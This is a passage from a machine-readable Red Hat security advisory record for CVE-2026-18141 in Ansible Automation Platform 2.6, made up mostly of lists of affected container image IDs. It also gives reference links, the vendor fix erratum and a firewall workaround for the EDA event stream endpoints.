"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-18141"
},
{
"category": "external",
"summary": "RHBZ#2508155",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2508155"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-18141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-18141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-18141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18141"
}
],
"release_date": "2026-07-31T15:28:47.213000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Restrict network access to the EDA event stream endpoints at the firewall or load balancer level. Ensure that only trusted sources are permitted to reach the event stream ports. Additionally, monitor EDA event logs for any unexpected events originating from unverified sources.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
